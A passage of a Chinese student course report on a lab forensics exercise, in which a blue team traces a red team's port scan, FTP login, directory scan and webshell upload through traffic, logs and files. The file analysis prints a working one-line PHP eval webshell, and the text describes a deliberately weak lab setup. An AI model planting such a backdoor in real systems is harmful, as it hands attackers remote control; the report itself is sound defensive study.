<!DOCTYPE html>
<html lang="zh-cn" dir="ltr">
    <head><meta charset='utf-8'>
<meta name='viewport' content='width=device-width, initial-scale=1'><meta name='description' content="电子与信息工程学院 计算机取证技术实训 课程报告 题\u3000目： 计算机取证技术实训\n学\u3000院： 电子与信息工程学院\n专\u3000业： 电子信息工程（信息安全）\n组\u3000号： 第 2 组\n任课教师： 容振邦\n起止日期： 2025 年 10 月 13 日至 2026 年 1 月 2 日\n">
<title>计算机取证技术实训</title>

<link rel='canonical' href='https://charles-lin-cell.github.io/p/%E8%AE%A1%E7%AE%97%E6%9C%BA%E5%8F%96%E8%AF%81%E6%8A%80%E6%9C%AF%E5%AE%9E%E8%AE%AD/'>

<link rel="stylesheet" href="/scss/style.min.8d59664cd30106ead78f46b5635ac7ecfcec14cf7b0bcebc89f98d394fc5d993.css"><meta property='og:title' content="计算机取证技术实训">
<meta property='og:description' content="电子与信息工程学院 计算机取证技术实训 课程报告 题\u3000目： 计算机取证技术实训\n学\u3000院： 电子与信息工程学院\n专\u3000业： 电子信息工程（信息安全）\n组\u3000号： 第 2 组\n任课教师： 容振邦\n起止日期： 2025 年 10 月 13 日至 2026 年 1 月 2 日\n">
<meta property='og:url' content='https://charles-lin-cell.github.io/p/%E8%AE%A1%E7%AE%97%E6%9C%BA%E5%8F%96%E8%AF%81%E6%8A%80%E6%9C%AF%E5%AE%9E%E8%AE%AD/'>
<meta property='og:site_name' content='梦幻星河的博客'>
<meta property='og:type' content='article'><meta property='article:section' content='Post' /><meta property='article:published_time' content='2026-08-03T17:15:50&#43;08:00'/><meta property='article:modified_time' content='2026-08-07T16:08:34&#43;08:00'/>
<meta name="twitter:title" content="计算机取证技术实训">
<meta name="twitter:description" content="电子与信息工程学院 计算机取证技术实训 课程报告 题\u3000目： 计算机取证技术实训\n学\u3000院： 电子与信息工程学院\n专\u3000业： 电子信息工程（信息安全）\n组\u3000号： 第 2 组\n任课教师： 容振邦\n起止日期： 2025 年 10 月 13 日至 2026 年 1 月 2 日\n">
    <link rel="shortcut icon" href="/favicon.ico" />

    </head>
    <body class="
    article-page
    ">
    <script>
        (function() {
            const colorSchemeKey = 'StackColorScheme';
            if(!localStorage.getItem(colorSchemeKey)){
                localStorage.setItem(colorSchemeKey, "auto");
            }
        })();
    </script><script>
    (function() {
        const colorSchemeKey = 'StackColorScheme';
        const colorSchemeItem = localStorage.getItem(colorSchemeKey);
        const supportDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches === true;

        if (colorSchemeItem == 'dark' || colorSchemeItem === 'auto' && supportDarkMode) {
            

            document.documentElement.dataset.scheme = 'dark';
        } else {
            document.documentElement.dataset.scheme = 'light';
        }
    })();
</script>
<div class="container main-container flex on-phone--column extended"><aside class="sidebar left-sidebar sticky ">
    <button class="hamburger hamburger--spin" type="button" id="toggle-menu" aria-label="切换菜单">
        <span class="hamburger-box">
            <span class="hamburger-inner"></span>
        </span>
    </button>

    <header>
        
            
            <figure class="site-avatar">
                <a href="/">
                
                    
                    
                    
                        
                        <img src="/img/avatar_hu407594167405330445.png" width="300"
                            height="250" class="site-logo" loading="lazy" alt="Avatar">
                    
                
                </a>
                
                    <span class="emoji">⭐️</span>
                
            </figure>
            
        
        
        <div class="site-meta">
            <h1 class="site-name"><a href="/">梦幻星河的博客</a></h1>
            <h2 class="site-description">本博客运用[hugo&#43;github]技术，主要记录生活琐事。</h2>
        </div>
    </header><ol class="menu-social">
            
                <li>
                    <a 
                        href='https://space.bilibili.com/1510507542'
                        target="_blank"
                        title="Bilibili"
                        rel="me"
                    >
                        
                        
                            <svg  xmlns="http://www.w3.org/2000/svg"  width="24"  height="24"  viewBox="0 0 24 24"  fill="none"  stroke="currentColor"  stroke-width="2"  stroke-linecap="round"  stroke-linejoin="round"  class="icon icon-tabler icons-tabler-outline icon-tabler-brand-bilibili"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M3 10a4 4 0 0 1 4 -4h10a4 4 0 0 1 4 4v6a4 4 0 0 1 -4 4h-10a4 4 0 0 1 -4 -4v-6z" /><path d="M8 3l2 3" /><path d="M16 3l-2 3" /><path d="M9 13v-2" /><path d="M15 11v2" /></svg>
                        
                    </a>
                </li>
            
                <li>
                    <a 
                        href='https://gitee.com/login?redirect_to_url=%2F'
                        target="_blank"
                        title="Gitee"
                        rel="me"
                    >
                        
                        
                            <svg  xmlns="http://www.w3.org/2000/svg"  width="24"  height="24"  viewBox="0 0 24 24"  fill="none"  stroke="currentColor"  stroke-width="2"  stroke-linecap="round"  stroke-linejoin="round"  class="icon icon-tabler icons-tabler-outline icon-tabler-brand-google"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M20.945 11a9 9 0 1 1 -3.284 -5.997l-2.655 2.392a5.5 5.5 0 1 0 2.119 6.605h-4.125v-3h7.945z" /></svg>
                        
                    </a>
                </li>
            
                <li>
                    <a 
                        href='https://github.com'
                        target="_blank"
                        title="GitHub"
                        rel="me"
                    >
                        
                        
                            <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-brand-github" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z" fill="none"/>
  <path d="M9 19c-4.3 1.4 -4.3 -2.5 -6 -3m12 5v-3.5c0 -1 .1 -1.4 -.5 -2c2.8 -.3 5.5 -1.4 5.5 -6a4.6 4.6 0 0 0 -1.3 -3.2a4.2 4.2 0 0 0 -.1 -3.2s-1.1 -.3 -3.5 1.3a12.3 12.3 0 0 0 -6.2 0c-2.4 -1.6 -3.5 -1.3 -3.5 -1.3a4.2 4.2 0 0 0 -.1 3.2a4.6 4.6 0 0 0 -1.3 3.2c0 4.6 2.7 5.7 5.5 6c-.6 .6 -.6 1.2 -.5 2v3.5" />
</svg>



                        
                    </a>
                </li>
            
        </ol><ol class="menu" id="main-menu">
        
        
        
        <li >
            <a href='/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-home" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <polyline points="5 12 3 12 12 3 21 12 19 12" />
  <path d="M5 12v7a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-7" />
  <path d="M9 21v-6a2 2 0 0 1 2 -2h2a2 2 0 0 1 2 2v6" />
</svg>



                
                <span>主页</span>
            </a>
        </li>
        
        
        <li >
            <a href='/%E5%85%B3%E4%BA%8Eabout/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-user" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="7" r="4" />
  <path d="M6 21v-2a4 4 0 0 1 4 -4h4a4 4 0 0 1 4 4v2" />
</svg>



                
                <span>关于|About</span>
            </a>
        </li>
        
        
        <li >
            <a href='/archives/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-archive" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <rect x="3" y="4" width="18" height="4" rx="2" />
  <path d="M5 8v10a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-10" />
  <line x1="10" y1="12" x2="14" y2="12" />
</svg>



                
                <span>归档|Archives</span>
            </a>
        </li>
        
        
        <li >
            <a href='/search/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-search" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="10" cy="10" r="7" />
  <line x1="21" y1="21" x2="15" y2="15" />
</svg>



                
                <span>搜索|Search</span>
            </a>
        </li>
        
        
        <li >
            <a href='/%E9%93%BE%E6%8E%A5link/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-link" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <path d="M10 14a3.5 3.5 0 0 0 5 0l4 -4a3.5 3.5 0 0 0 -5 -5l-.5 .5" />
  <path d="M14 10a3.5 3.5 0 0 0 -5 0l-4 4a3.5 3.5 0 0 0 5 5l.5 -.5" />
</svg>



                
                <span>链接|Link</span>
            </a>
        </li>
        
        <li class="menu-bottom-section">
            <ol class="menu">

                
                    <li id="dark-mode-toggle">
                        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-left" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="8" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-right" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="16" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                        <span>暗色模式</span>
                    </li>
                
            </ol>
        </li>
    </ol>
</aside>

    <aside class="sidebar right-sidebar sticky">
        
            
                
    <section class="widget archives">
        <div class="widget-icon">
            <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-hash" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <line x1="5" y1="9" x2="19" y2="9" />
  <line x1="5" y1="15" x2="19" y2="15" />
  <line x1="11" y1="4" x2="7" y2="20" />
  <line x1="17" y1="4" x2="13" y2="20" />
</svg>



        </div>
        <h2 class="widget-title section-title">目录</h2>
        
        <div class="widget--toc">
            <nav id="TableOfContents">
  <ol>
    <li><a href="#计算机取证技术实训-课程报告">计算机取证技术实训 课程报告</a></li>
  </ol>

  <ol>
    <li><a href="#11-背景">1.1 背景</a></li>
    <li><a href="#12-具体任务概述">1.2 具体任务概述</a>
      <ol>
        <li><a href="#蓝队任务">蓝队任务</a></li>
        <li><a href="#红队任务">红队任务</a></li>
      </ol>
    </li>
  </ol>

  <ol>
    <li><a href="#21-主流计算机取证技术概述">2.1 主流计算机取证技术概述</a></li>
    <li><a href="#22-本次实训采用的取证技术与工具">2.2 本次实训采用的取证技术与工具</a></li>
  </ol>

  <ol>
    <li><a href="#31-网络规划">3.1 网络规划</a>
      <ol>
        <li><a href="#311-网络配置">3.1.1 网络配置</a></li>
        <li><a href="#312-环境搭建过程">3.1.2 环境搭建过程</a></li>
        <li><a href="#313-蓝队取证场景说明">3.1.3 蓝队取证场景说明</a></li>
      </ol>
    </li>
    <li><a href="#32-网络流量取证">3.2 网络流量取证</a>
      <ol>
        <li><a href="#321-流量捕获准备">3.2.1 流量捕获准备</a></li>
        <li><a href="#322-端口扫描流量分析">3.2.2 端口扫描流量分析</a></li>
        <li><a href="#323-ftp-爆破流量分析">3.2.3 FTP 爆破流量分析</a></li>
        <li><a href="#324-web-目录扫描流量分析">3.2.4 Web 目录扫描流量分析</a></li>
        <li><a href="#325-sql-写入-shell-流量分析">3.2.5 SQL 写入 Shell 流量分析</a></li>
      </ol>
    </li>
    <li><a href="#33-系统日志分析取证">3.3 系统日志分析取证</a>
      <ol>
        <li><a href="#331-windows-安全日志分析">3.3.1 Windows 安全日志分析</a></li>
        <li><a href="#332-iis-web-日志分析">3.3.2 IIS Web 日志分析</a></li>
      </ol>
    </li>
    <li><a href="#34-文件证据提取">3.4 文件证据提取</a>
      <ol>
        <li><a href="#341-恶意文件查找">3.4.1 恶意文件查找</a></li>
        <li><a href="#342-文件内容验证">3.4.2 文件内容验证</a></li>
        <li><a href="#343-文件属性分析">3.4.3 文件属性分析</a></li>
      </ol>
    </li>
    <li><a href="#35-ip-溯源分析">3.5 IP 溯源分析</a>
      <ol>
        <li><a href="#351-公网-ip-获取">3.5.1 公网 IP 获取</a></li>
        <li><a href="#352-威胁情报查询">3.5.2 威胁情报查询</a></li>
        <li><a href="#353-溯源结论">3.5.3 溯源结论</a></li>
      </ol>
    </li>
  </ol>

  <ol>
    <li><a href="#41-实训总结">4.1 实训总结</a></li>
    <li><a href="#42-问题与解决方案">4.2 问题与解决方案</a></li>
    <li><a href="#43-可行性分析">4.3 可行性分析</a>
      <ol>
        <li><a href="#431-技术可行性">4.3.1 技术可行性</a></li>
        <li><a href="#432-环境可行性">4.3.2 环境可行性</a></li>
        <li><a href="#433-操作可行性">4.3.3 操作可行性</a></li>
      </ol>
    </li>
    <li><a href="#44-信息安全相关法律法规运用">4.4 信息安全相关法律法规运用</a>
      <ol>
        <li><a href="#441-核心法律法规依据">4.4.1 核心法律法规依据</a></li>
        <li><a href="#442-实训中的合规性实践">4.4.2 实训中的合规性实践</a></li>
      </ol>
    </li>
    <li><a href="#45-展望">4.5 展望</a></li>
  </ol>

  <ol>
    <li><a href="#红队攻击命令">红队攻击命令</a></li>
    <li><a href="#蓝队取证命令">蓝队取证命令</a></li>
    <li><a href="#附录-b-关键配置文件内容">附录 B 关键配置文件内容</a>
      <ol>
        <li><a href="#1-kali-linux-网络配置文件etcnetworkinterfaces">1. Kali Linux 网络配置文件（<code>/etc/network/interfaces</code>）</a></li>
        <li><a href="#2-一句话木马文件webshellphp">2. 一句话木马文件（<code>webshell.php</code>）</a></li>
      </ol>
    </li>
  </ol>
</nav>
        </div>
    </section>

            
        
    </aside>


            <main class="main full-width">
    <article class="main-article">
    <header class="article-header">

    <div class="article-details">
 
    <footer class="article-time">

        <div class="article-lastmod">
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-clock" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <polyline points="12 7 12 12 15 15" />
</svg>



                <time>
                    Aug 07, 2026 16:08 &#43;0800
                </time>
            </div></footer>

</div>

</header>

    <section class="article-content">
    
    
    <h1 id="电子与信息工程学院">电子与信息工程学院
</h1><h2 id="计算机取证技术实训-课程报告">计算机取证技术实训 课程报告
</h2><p><strong>题　　目：</strong> 计算机取证技术实训<br>
<strong>学　　院：</strong> 电子与信息工程学院<br>
<strong>专　　业：</strong> 电子信息工程（信息安全）<br>
<strong>组　　号：</strong> 第 2 组<br>
<strong>任课教师：</strong> 容振邦<br>
<strong>起止日期：</strong> 2025 年 10 月 13 日至 2026 年 1 月 2 日</p>
<hr>
<h1 id="第-1-章背景">第 1 章　背景
</h1><h2 id="11-背景">1.1 背景
</h2><p>在信息化时代，企业 Web 系统是业务运行的核心，但也是网络攻击的主要目标。为了应对非法入侵，企业需通过计算机取证技术还原攻击过程，锁定攻击者身份。</p>
<p>本次实训模拟了企业 Web 系统被攻击的场景。蓝队（防守方）的任务是通过流量捕获、日志分析、文件检查和 IP 溯源，形成完整的证据链，最终完成攻击溯源。</p>
<h2 id="12-具体任务概述">1.2 具体任务概述
</h2><h3 id="蓝队任务">蓝队任务
</h3><ol>
<li>全程监控攻击行为：提前部署取证工具，确保攻击发生时能第一时间捕获流量，日志和文件变化。</li>
<li>多维度取证：结合网络流量、系统日志、文件内容和 IP 溯源，验证攻击者的每一步操作。</li>
<li>攻击溯源：通过 IP 查询平台定位攻击源，确认攻击者地理位置和历史行为。</li>
</ol>
<h3 id="红队任务">红队任务
</h3><p>红队通过以下步骤实施攻击：</p>
<ol>
<li>使用 nmap 扫描目标端口</li>
<li>通过 Hydra 爆破 FTP 弱口令</li>
<li>利用 ffuf 扫描 Web 敏感目录</li>
<li>登录后台并上传 WebShell</li>
</ol>
<hr>
<h1 id="第-2-章计算机取证技术介绍">第 2 章　计算机取证技术介绍
</h1><h2 id="21-主流计算机取证技术概述">2.1 主流计算机取证技术概述
</h2><p>计算机取证技术是指在合法合规前提下，对计算机系统、网络环境中的攻击痕迹进行识别、收集、保全、分析和呈现的一系列技术方法，主要包括以下类别：</p>
<ol>
<li><strong>网络流量取证技术</strong>：通过捕获网络传输数据包，分析通信双方、传输内容、协议类型等信息，还原网络交互过程，常用工具包括 Wireshark、tcpdump 等。</li>
<li><strong>日志分析取证技术</strong>：收集操作系统、应用程序、网络设备等产生的日志数据，提取关键操作记录、访问痕迹和异常行为，常用工具包括 Log Parser Lizard、ELK Stack 等。</li>
<li><strong>文件取证技术</strong>：对系统文件、数据库文件、缓存文件等进行分析，查找被篡改痕迹、恶意文件残留等，常用工具包括 Notepad++、WinHex 等。</li>
<li><strong>IP 溯源技术</strong>：通过 IP 地址查询其地理位置、运营商、历史行为等信息，定位攻击源头，常用平台包括微步在线、IP138 等。</li>
<li><strong>蜜罐取证技术</strong>：通过构建模拟目标系统的诱捕环境，吸引攻击方攻击并记录其攻击行为，但本次实训未采用该技术。</li>
</ol>
<h2 id="22-本次实训采用的取证技术与工具">2.2 本次实训采用的取证技术与工具
</h2><p>结合实训场景需求，本次实训重点采用以下技术与工具：</p>
<ol>
<li><strong>网络流量取证</strong>：使用 Wireshark 工具捕获红蓝双方网络交互数据包，通过过滤规则筛选攻击相关流量，还原端口扫描、弱口令爆破、目录扫描等攻击过程。</li>
<li><strong>日志分析取证</strong>：通过 Windows 事件查看器提取系统安全日志，使用 Log Parser Lizard 分析 IIS Web 服务器日志，验证攻击方的登录行为和 Web 访问轨迹。</li>
<li><strong>文件取证</strong>：利用 Notepad++ 查看恶意文件内容，通过文件属性分析创建时间与攻击时间的关联性，确认攻击遗留证据。</li>
<li><strong>IP 溯源技术</strong>：通过微步在线威胁情报平台，查询攻击方 IP 地址的地理位置、运营商信息和历史攻击行为，完成攻击源头定位。</li>
<li><strong>辅助工具</strong>：包括 XAMPP（搭建 Web 与数据库环境）、Kali Linux（红方攻击平台）、Dedecms（存在漏洞的 Web 系统）等，为攻防与取证提供环境支撑。</li>
</ol>
<hr>
<h1 id="第-3-章取证过程">第 3 章　取证过程
</h1><h2 id="31-网络规划">3.1 网络规划
</h2><h3 id="311-网络配置">3.1.1 网络配置
</h3><p>根据课程要求，本次实训使用 172.3.0.0/16 网段，红蓝双方网络配置如下：</p>
<div class="table-wrapper"><table>
  <thead>
      <tr>
          <th>角色</th>
          <th>操作系统</th>
          <th>设备类型</th>
          <th>IP 地址</th>
          <th>子网掩码</th>
          <th>网关</th>
          <th>DNS</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>蓝队</td>
          <td>Windows Server 2019</td>
          <td>目标服务器</td>
          <td>172.3.200.10</td>
          <td>255.255.0.0</td>
          <td>无</td>
          <td>8.8.8.8</td>
      </tr>
      <tr>
          <td>红队</td>
          <td>Kali Linux</td>
          <td>攻击机</td>
          <td>172.3.200.20</td>
          <td>255.255.0.0</td>
          <td>无</td>
          <td>默认</td>
      </tr>
  </tbody>
</table></div>
<h3 id="312-环境搭建过程">3.1.2 环境搭建过程
</h3><ol>
<li>
<p><strong>虚拟机网络模式配置</strong>：红蓝双方虚拟机均设置为“仅主机模式”，避免外部网络干扰，确保内网互通。<br>
（Kali 网络适配器配置截图）</p>
<p><img src="/%5c%5cimages%5c1.png"
	
	
	
	loading="lazy"
	
	
></p>
<p>（Windows Server 2019 网络适配器配置截图）</p>
<p><img src="/%5c%5cimages%5c2.png"
	
	
	
	loading="lazy"
	
	
></p>
<p><img src="/%5c%5cimages%5c3.png"
	
	
	
	loading="lazy"
	
	
></p>
</li>
<li>
<p><strong>Web 系统搭建</strong>：蓝队在 Windows Server 2019 上通过 Chocolatey 安装 XAMPP 环境（含 Apache、MySQL、PHP），部署存在弱口令和后台 Getshell 漏洞的 Dedecms 5.7.118 版本，管理员账号 admin，密码 admin。</p>
</li>
<li>
<p><strong>FTP 服务配置</strong>：蓝队在 Windows Server 2019 上搭建 FTP 站点 MyFTPSite，开启匿名登录，放行 21 端口，物理路径为 C:\inetpub\ftproot。</p>
</li>
<li>
<p><strong>取证工具安装</strong>：<br>
蓝队安装 Wireshark（流量捕获）、Log Parser Lizard（日志分析）、Notepad++（文件查看）等工具；<br>
红队使用 Kali Linux 自带的 Nmap（端口扫描）、Hydra（弱口令爆破）、Ffuf（目录扫描）等攻击工具。</p>
</li>
<li>
<p><strong>连通性验证</strong>：<br>
蓝队通过 cmd 执行 <code>ping 172.3.200.20</code>，红队通过终端执行 <code>ping 172.3.200.10</code>，双方均显示 0% 丢包率，确认网络互通。</p>
<p><img src="/%5c%5cimages%5c4.png"
	
	
	
	loading="lazy"
	
	
></p>
<p><img src="/%5c%5cimages%5c5.png"
	
	
	
	loading="lazy"
	
	
></p>
</li>
</ol>
<h3 id="313-蓝队取证场景说明">3.1.3 蓝队取证场景说明
</h3><ol>
<li>预置取证工具：在系统启动后立即部署 Wireshark 和日志监控工具。</li>
<li>实时流量捕获：通过 Wireshark 捕获全部网络流量，保存为证据文件。</li>
<li>日志监控：持续查看 Windows 安全日志和 IIS 访问日志，发现异常行为。</li>
<li>文件检查：定期扫描 Web 目录，识别可疑文件。</li>
<li>IP 溯源：攻击结束后立即查询攻击 IP 的地理位置。</li>
</ol>
<h2 id="32-网络流量取证">3.2 网络流量取证
</h2><p>网络流量取证是通过 Wireshark 捕获红蓝双方网络交互数据包，筛选攻击相关流量，还原攻击过程的核心技术。本次实训通过设置针对性过滤规则，精准捕获各攻击阶段的流量数据。</p>
<h3 id="321-流量捕获准备">3.2.1 流量捕获准备
</h3><p>蓝队启动 Wireshark 工具，选择与红队互通的“以太网”网卡，点击开始捕获按钮，确保攻击过程中全程捕获数据包。捕获完成后，将文件保存为 <code>Attack_traffic.pcap</code>，作为原始流量证据。</p>
<h3 id="322-端口扫描流量分析">3.2.2 端口扫描流量分析
</h3><p>蓝队在 Wireshark 中输入过滤规则：<br>
<code>ip.addr == 172.3.200.20 and tcp.flags.syn == 1</code><br>
筛选 SYN 扫描特征数据包。<br>
分析结果显示：红队 IP（172.3.200.20）向蓝队 IP（172.3.200.10）的多个端口发送 SYN 请求，其中 80 端口（HTTP 服务）和 21 端口（FTP 服务）返回 SYN-ACK 响应，确认蓝方开放这两个关键服务，与红队扫描结果一致，证明红队实施了端口扫描攻击。<br>
（蓝队 Wireshark 扫描结果截图）</p>
<p><img src="/%5c%5cimages%5c7.png"
	
	
	
	loading="lazy"
	
	
></p>
<h3 id="323-ftp-爆破流量分析">3.2.3 FTP 爆破流量分析
</h3><p>蓝队在 Wireshark 中输入过滤规则：<br>
<code>ip.addr == 172.3.200.20 and ftp</code><br>
筛选 FTP 协议流量。<br>
分析结果显示：捕获到红队发送的 FTP 登录请求数据包，用户名和密码均为 anonymous，且后续数据包显示 “Login successful” 响应，证明红队通过弱口令爆破成功登录 FTP 服务器。该流量证据直接验证了红队的 FTP 爆破行为。<br>
（蓝队 Wireshark 捕获结果截图）</p>
<p><img src="/%5c%5cimages%5c9.png"
	
	
	
	loading="lazy"
	
	
></p>
<h3 id="324-web-目录扫描流量分析">3.2.4 Web 目录扫描流量分析
</h3><p>蓝队在 Wireshark 中输入过滤规则：<br>
<code>ip.addr == 172.3.200.20 and http.request.method == &quot;GET&quot;</code><br>
筛选红队的 HTTP GET 请求。<br>
分析结果显示：红队在短时间内发送大量 GET 请求，尝试访问 /dedecms 目录下的不同路径，其中包含 /dede（Dedecms 后台）、/phpmyadmin（数据库管理页）等敏感路径的访问请求，符合目录扫描的特征，证明红队实施了 Web 目录探测攻击。<br>
（蓝队捕获 ffuf 目录扫描截图）</p>
<p><img src="/%5c%5cimages%5c13.png"
	
	
	
	loading="lazy"
	
	
></p>
<h3 id="325-sql-写入-shell-流量分析">3.2.5 SQL 写入 Shell 流量分析
</h3><p>蓝队在 Wireshark 中输入过滤规则：<br>
<code>ip.addr == 172.3.200.20 and http.request.method == &quot;POST&quot; and http.host == &quot;172.3.200.10/phpmyadmin&quot;</code><br>
筛选相关 POST 请求。<br>
尽管部分流量被 Windows Defender 拦截，但通过威胁历史记录和后续文件验证，结合捕获到的 phpMyAdmin 访问流量，确认红队通过 POST 请求提交了 SQL 注入语句，成功写入恶意文件。在蓝方 web 目录下面成功找到 webshell.php。</p>
<p><img src="/%5c%5cimages%5c15.png"
	
	
	
	loading="lazy"
	
	
></p>
<p><img src="/%5c%5cimages%5c16.png"
	
	
	
	loading="lazy"
	
	
></p>
<h2 id="33-系统日志分析取证">3.3 系统日志分析取证
</h2><p>系统日志分析通过提取操作系统和 Web 服务器的日志记录，验证攻击方的访问行为和操作轨迹，是取证过程的重要环节。本次实训重点分析 Windows 安全日志和 IIS Web 日志。</p>
<h3 id="331-windows-安全日志分析">3.3.1 Windows 安全日志分析
</h3><p>蓝队打开“事件查看器”（win+R 输入 <code>eventvwr.msc</code>），展开“Windows 日志 → 安全”，筛选事件 ID 4624（登录成功事件）。<br>
分析结果显示：存在来源 IP 为 172.3.200.20（红队）的登录记录，登录类型为 5（网络登录），登录时间与红队 FTP 爆破成功时间一致，由于红队采用匿名登录，用户名字段显示为“暂缺”。该日志证据验证了红队通过网络登录蓝队服务器的行为。<br>
（事件查看器截图）</p>
<p><img src="/%5c%5cimages%5c17.png"
	
	
	
	loading="lazy"
	
	
></p>
<h3 id="332-iis-web-日志分析">3.3.2 IIS Web 日志分析
</h3><p>蓝队使用 Log Parser Lizard 工具导入 IIS 日志文件（路径：<code>C:\xampp\apache\logs\access.log</code>），执行查询语句：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="k">SELECT</span><span class="w"> </span><span class="nb">date</span><span class="p">,</span><span class="w"> </span><span class="n">time</span><span class="p">,</span><span class="w"> </span><span class="k">c</span><span class="o">-</span><span class="n">ip</span><span class="p">,</span><span class="w"> </span><span class="n">cs</span><span class="o">-</span><span class="k">method</span><span class="p">,</span><span class="w"> </span><span class="n">cs</span><span class="o">-</span><span class="n">uri</span><span class="o">-</span><span class="n">stem</span><span class="w"> 
</span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="k">FROM</span><span class="w"> </span><span class="s1">&#39;C:\xampp\apache\logs\access.log&#39;</span><span class="w"> 
</span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="k">WHERE</span><span class="w"> </span><span class="k">c</span><span class="o">-</span><span class="n">ip</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s1">&#39;172.3.200.20&#39;</span><span class="w">
</span></span></span></code></pre></td></tr></table>
</div>
</div><p>筛选红队访问记录。</p>
<p><img src="/%5c%5cimages%5c18.png"
	
	
	
	loading="lazy"
	
	
></p>
<p><img src="/%5c%5cimages%5c19.png"
	
	
	
	loading="lazy"
	
	
></p>
<p>分析结果显示：</p>
<ol>
<li>2025 年 12 月 10 日 17:37:20，红队访问 /dedecms/dede 路径，与后台登录时间一致；</li>
<li>同一时间段内，红队多次访问 /phpmyadmin 相关路径，与 SQL 写入 Shell 的攻击步骤吻合；</li>
<li>日志中记录了红队使用 Ffuf 工具的访问特征（User-Agent 为 “Fuzz Faster U Fool v2.1.0-dev”），进一步验证了目录扫描行为。</li>
</ol>
<p>Web 日志完整记录了红队的 Web 访问轨迹，与网络流量取证结果相互印证，形成闭环证据。</p>
<h2 id="34-文件证据提取">3.4 文件证据提取
</h2><p>文件证据是攻击方遗留的直接证据，通过查找恶意文件、验证文件内容和创建时间，可直接证明攻击行为的实施。本次实训的核心文件证据为红队写入的一句话木马文件。</p>
<h3 id="341-恶意文件查找">3.4.1 恶意文件查找
</h3><p>蓝队根据流量分析和日志记录，定位 Web 系统根目录 <code>C:\xampp\htdocs\dedecms</code>，在该目录下发现名为 <code>webshell.php</code> 的可疑文件，该文件不在 Dedecms 默认文件列表中，疑似红队攻击遗留文件。</p>
<p><img src="/%5c%5cimages%5c20.png"
	
	
	
	loading="lazy"
	
	
></p>
<h3 id="342-文件内容验证">3.4.2 文件内容验证
</h3><p>蓝队使用 Notepad++ 打开 <code>webshell.php</code>，文件内容为：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-php" data-lang="php"><span class="line"><span class="cl"><span class="o">&lt;?</span><span class="nx">php</span> <span class="o">@</span><span class="k">eval</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s2">&#34;cmd&#34;</span><span class="p">]);</span><span class="cp">?&gt;</span><span class="err">
</span></span></span></code></pre></td></tr></table>
</div>
</div><p>确认该文件为一句话木马，攻击者可通过蚁剑等工具连接该文件，获取服务器控制权。</p>
<p><img src="/%5c%5cimages%5c21.png"
	
	
	
	loading="lazy"
	
	
></p>
<h3 id="343-文件属性分析">3.4.3 文件属性分析
